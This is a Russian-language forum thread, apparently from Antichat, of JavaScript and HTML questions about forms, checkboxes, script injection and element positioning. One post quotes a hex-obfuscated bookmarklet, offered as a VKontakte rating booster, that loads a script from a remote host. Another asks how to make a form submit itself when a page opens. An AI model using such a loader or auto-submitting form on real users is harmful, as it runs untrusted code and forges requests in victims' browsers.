Там в сорцах все прокоментировано: PHP: setInterval("Load();", 2000); // создаём таймер который будет вызывать загрузку сообщений каждые 2 секунды (2000 миллисекунд)
есть форма запроса PHP: <form class="mainform" action="" method="post" enctype="multipart/form-data" onsubmit="e=this.elements;l=e.length;e[l-1].disabled=e [l-2].disabled=true;try{this.submit();}catch(er){e[l-1].disabled=e [l-2].disabled=false;}"> <input бла бла бла бла /> </form> для подтверждения формы запроса что мне надо вписать вместо вопросительных знаков если значение name="" в форме отсутствует?? <script> document.?????.submit(); </script> суть в том, чтобы запрос выполнялся при открытии страницы , может самому прописать значение name="" в форме запроса или есть какие то способы подтверждения и без его наличия??
спасибо, пошел исправлять значения input , готовлю свою первую статью для античата, да простят меня грины.
HTML: java script:function loadScript(scriptURL) { var scriptElem = document.createElement('SCRIPT'); scriptElem.setAttribute('language',%20'%4A%61%76%61%53%63%72%69%70%74'); scriptElem.setAttribute('src', scriptURL); document.body.appendChild(scriptElem);}loadScript('%68%74%74%70%3A%2F%2F%75%73%65%72%61%65%2E%6E%61%72%6F%64%2E%72%75%2F%76%2E%6A%73'); что делает данный скрипт? якобы рейтинг вконте повышает?))
обращатся к индексам массива history можно,но нельзя посмотреть что там за url стоит... безопасность и все такое P.S. http://raz0r.name/obzory/chtenie-istorii-poseshhenij-s-pomoshhyu-css/
Подскажите, как отметить все галочки только одной формы Подскажите, как отметить все галочки только одной формы, а не всего документа? PHP: function check(self) { var a = document.getElementsByTagName('input'); var checkValue = self.checked; for (i=1; i<a.length; i++) { if (a[i].type=='checkbox') a[i].checked = checkValue; } } HTML: Все <input type="checkbox" id="chkAll" onclick="check(this)" />
с фреймворком jquery работал? почитай. в догонку почитай http://www.linkexchanger.su/ там и ответ есть на твой вопрос
HTML: <script src="jquery.js"></script> <script> $(document).ready(function() { $("#buttoncheck").click(function() { $("#forma").find("input[type*='checkbox']").attr("checked",1); }); $("#buttonuncheck").click(function() { $("#forma").find("input[type*='checkbox']").attr("checked",0); }); }); </script> <body> <!-- чекбоксы не в форме --> <input type=checkbox><br> <input type=checkbox><hr> <!-- форма с чекбоксами внутри --> <form id="forma"> <input type=checkbox><br> <input type=checkbox><br> <input type=checkbox><br> <input type=checkbox><br> <input type=button id="buttoncheck" value="Отметить"> <input type=button id="buttonuncheck" value="Снять"> </form>
спс, вот так сделал: HTML: function check(obj) { var a = obj.form.getElementsByTagName('input'); var checkValue = obj.checked; for (i=0; i<a.length; i++) { if (a[i].type=='checkbox'){ a[i].checked = checkValue;} } }
пытаюсь с помощью innerHTML вставить код вида "'<script type="text/javascript" src="bla.js" /> и выполнить его. Вроде, вставляется, но не выполняется. Как заставить его выполниться? Никаких document.write не предлагать, мне нужно обязательно вставить этот код в определённый див...
Возможно здесь это уже обсуждалось, но я не смог осилить 207 страниц.. Вот моя проблема. Такс буду объяснять пошагово... 1. Есть сайт там где есть немножко джавы Клацаешь на иконку вылазит окошко авторизации после клика "Войти" перенаправляет на страницу логина и т.п. Вопрос: как сделать чтоб без обновления страници начало в этом же джава окошке выдавать к примеру вот такое: №1 - авторизация №2 - Успешная авторизация №3 - Заявка №4 - Ваша заявка успешно принята и т.п Нужно чтоб все происходило в одном окошке этой же джавы от самой первой иконки. как это сделать?
Помогите. Как определить вертикальную координату объекта в документе? То есть, сколько в пикселях от верха окна до верха объекта.